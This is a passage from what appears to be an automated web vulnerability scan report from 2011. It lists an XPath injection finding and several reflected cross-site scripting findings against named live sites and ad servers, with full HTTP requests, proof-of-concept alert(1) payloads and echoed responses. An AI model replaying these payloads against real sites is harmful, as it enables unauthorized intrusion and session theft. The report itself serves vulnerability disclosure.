Severity:   High
Confidence:   Firm
Host:   https://www.trustedid.com
Path:   /js/prototype.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alhanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.

Request

GET /js/prototype.js'?45cfd1b2f5 HTTP/1.1
Host: www.trustedid.com
Connection: keep-alive
Referer: https://www.trustedid.com/idfide01/?promoCodeRefIde=NXTIDF01IDEFT&promoCodeRefIdf=NXTIDF01IDFFT15
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TIDT=173.193.214.243.1303614754152763; TSI=6rjj85kupb6n5r77pnlgtoq3g0; promoRefCode=NXDIRSUZIDPANN

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:16:02 GMT
Server: Apache
Last-Modified: Fri, 17 Jul 2009 18:23:54 GMT
ETag: "1103eb-1e468-e4086280"
Accept-Ranges: bytes
Cache-Control: max-age=300
Expires: Sun, 24 Apr 2011 03:21:02 GMT
Connection: Keep-Alive
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 124008

/* Prototype JavaScript framework, version 1.6.0.1
* (c) 2005-2007 Sam Stephenson
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see the Prototyp
...[SNIP]...
Gecko: navigator.userAgent.indexOf('Gecko') > -1 && navigator.userAgent.indexOf('KHTML') == -1,
MobileSafari: !!navigator.userAgent.match(/Apple.*Mobile.*Safari/)
},

BrowserFeatures: {
XPath: !!document.evaluate,
ElementExtensions: !!window.HTMLElement,
SpecificElementExtensions:
document.createElement('div').__proto__ &&
document.createElement('div').__proto__ !==

...[SNIP]...

5. Cross-site scripting (reflected)  previous  next
There are 98 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


5.1. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.15 [labels parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2886.151350.QUANTCAST.COM/B5403001.15

Issue detail

The value of the labels request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f993c"-alert(1)-"20f0488e922 was submitted in the labels parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N2886.151350.QUANTCAST.COM/B5403001.15;sz=160x600;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb,_click.rand.43369f993c"-alert(1)-"20f0488e922&rtbip=63.251.90.149&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKKgXMMvbHjozaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwQgcI1sUHEPcBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFloGnUEsIU_gAHPk_nrBpABhKsHoAEBqAGmswewAQI&redirecturl2=;ord=43369? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303665997&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647997762&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303647997767&frm=1&adk=2614322350&ga_vid=1901204360.1303647998&ga_sid=1303647998&ga_hid=1446633403&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 12:37:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7318

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
3/f/192/%2a/k%3B240320597%3B0-0%3B0%3B62289813%3B2321-160/600%3B41844251/41862038/1%3B%3B%7Esscs%3D%3fhttp://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb,_click.rand.43369f993c"-alert(1)-"20f0488e922&rtbip=63.251.90.149&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKKgXMMvbHjozaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwQgcI1sUHEPcBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY
...[SNIP]...

5.2. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.15 [redirecturl2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2886.151350.QUANTCAST.COM/B5403001.15

Issue detail

The value of the redirecturl2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 499fc"-alert(1)-"cfc85e2b456 was submitted in the redirecturl2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N2886.151350.QUANTCAST.COM/B5403001.15;sz=160x600;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb,_click.rand.43369&rtbip=63.251.90.149&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKKgXMMvbHjozaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwQgcI1sUHEPcBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFloGnUEsIU_gAHPk_nrBpABhKsHoAEBqAGmswewAQI&redirecturl2=499fc"-alert(1)-"cfc85e2b456 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303665997&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647997762&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303647997767&frm=1&adk=2614322350&ga_vid=1901204360.1303647998&ga_sid=1303647998&ga_hid=1446633403&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7222
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 24 Apr 2011 12:39:39 GMT
Expires: Sun, 24 Apr 2011 12:39:39 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwQgcI1sUHEPcBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFloGnUEsIU_gAHPk_nrBpABhKsHoAEBqAGmswewAQI&redirecturl2=499fc"-alert(1)-"cfc85e2b456http://www.metropcs.com/android?utm_source=DART&utm_medium=Display%2BMedia&utm_campaign=MPCS%2BGM%2BQ2%2BInterim%2B(5403001)");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque
...[SNIP]...

5.3. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.15 [rtbdata2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2886.151350.QUANTCAST.COM/B5403001.15

Issue detail

The value of the rtbdata2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f76fe"-alert(1)-"0f47eb8b094 was submitted in the rtbdata2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N2886.151350.QUANTCAST.COM/B5403001.15;sz=160x600;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb,_click.rand.43369&rtbip=63.251.90.149&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKKgXMMvbHjozaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwQgcI1sUHEPcBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFloGnUEsIU_gAHPk_nrBpABhKsHoAEBqAGmswewAQIf76fe"-alert(1)-"0f47eb8b094&redirecturl2=;ord=43369? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303665997&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647997762&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303647997767&frm=1&adk=2614322350&ga_vid=1901204360.1303647998&ga_sid=1303647998&ga_hid=1446633403&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 12:39:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7318

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
gXMMvbHjozaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwQgcI1sUHEPcBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFloGnUEsIU_gAHPk_nrBpABhKsHoAEBqAGmswewAQIf76fe"-alert(1)-"0f47eb8b094&redirecturl2=http%3a%2f%2fwww.metropcs.com/android%3Futm_source%3DDART%26utm_medium%3DDisplay%252BMedia%26utm_campaign%3DMPCS%252BGM%252BQ2%252BInterim%252B%285403001%29");
var fscUrl = url;
var fsc
...[SNIP]...

5.4. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.15 [rtbip parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2886.151350.QUANTCAST.COM/B5403001.15

Issue detail

The value of the rtbip request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23c5b"-alert(1)-"62d3592bb19 was submitted in the rtbip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N2886.151350.QUANTCAST.COM/B5403001.15;sz=160x600;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb,_click.rand.43369&rtbip=63.251.90.14923c5b"-alert(1)-"62d3592bb19&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKKgXMMvbHjozaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwQgcI1sUHEPcBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFloGnUEsIU_gAHPk_nrBpABhKsHoAEBqAGmswewAQI&redirecturl2=;ord=43369? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303665997&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647997762&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303647997767&frm=1&adk=2614322350&ga_vid=1901204360.1303647998&ga_sid=1303647998&ga_hid=1446633403&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 12:38:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7318

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
20597%3B0-0%3B0%3B62289813%3B2321-160/600%3B41844251/41862038/1%3B%3B%7Esscs%3D%3fhttp://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb,_click.rand.43369&rtbip=63.251.90.14923c5b"-alert(1)-"62d3592bb19&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKKgXMMvbHjozaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwQgcI1sUHEPcBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFl
...[SNIP]...

5.5. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.15 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2886.151350.QUANTCAST.COM/B5403001.15

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb328"-alert(1)-"9fe4dc0640 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N2886.151350.QUANTCAST.COM/B5403001.15;sz=160x600;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1lseb328"-alert(1)-"9fe4dc0640&labels=_qc.clk,_click.adserver.rtb,_click.rand.43369&rtbip=63.251.90.149&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKKgXMMvbHjozaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwQgcI1sUHEPcBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFloGnUEsIU_gAHPk_nrBpABhKsHoAEBqAGmswewAQI&redirecturl2=;ord=43369? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303665997&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647997762&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303647997767&frm=1&adk=2614322350&ga_vid=1901204360.1303647998&ga_sid=1303647998&ga_hid=1446633403&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 12:37:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7314

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af3/f/191/%2a/k%3B240320597%3B0-0%3B0%3B62289813%3B2321-160/600%3B41844251/41862038/1%3B%3B%7Esscs%3D%3fhttp://exch.quantserve.com/r?a=p-03tSqaTFVs1lseb328"-alert(1)-"9fe4dc0640&labels=_qc.clk,_click.adserver.rtb,_click.rand.43369&rtbip=63.251.90.149&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKKgXMMvbHjozaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwQgcI1sUHEP
...[SNIP]...

5.6. http://ads.adxpose.com/ads/ads.js [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload ad34f<script>alert(1)</script>7e0dd690cc was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads/ads.js?uid=ZC45X9Axu6NOUFfX_289668ad34f<script>alert(1)</script>7e0dd690cc HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3667F90C3D92533777E23512D2CC53A4; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 12:29:28 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...
_LOG_EVENT__("000_000_3",b,j,"",Math.round(Y.left)+","+Math.round(Y.top),O+","+I,C,l,m,v,S,c)}}t=p.inView}}}if(!__ADXPOSE_PREFS__.override){__ADXPOSE_WIDGET_IN_VIEW__("container_ZC45X9Axu6NOUFfX_289668ad34f<script>alert(1)</script>7e0dd690cc".replace(/[^\w\d]/g,""),"ZC45X9Axu6NOUFfX_289668ad34f<script>
...[SNIP]...

5.7. http://ar.voicefive.com/b/rc.pli [func parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload e96ed<script>alert(1)</script>bfcafa00f07 was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteractione96ed<script>alert(1)</script>bfcafa00f07&n=ar_int_p97174789&1303647004372 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/common/adRevresda.asp?channel=home&Section=main&adsize=728x90&pos=bottom
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p97174789=exp=1&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 12:09:48 2011&prad=253735207&arc=186884836&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303646989%2E757%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:10:02 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteractione96ed<script>alert(1)</script>bfcafa00f07("");

5.8. http://event.adxpose.com/event.flow [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 98ed0<script>alert(1)</script>82d8bb5aab2 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

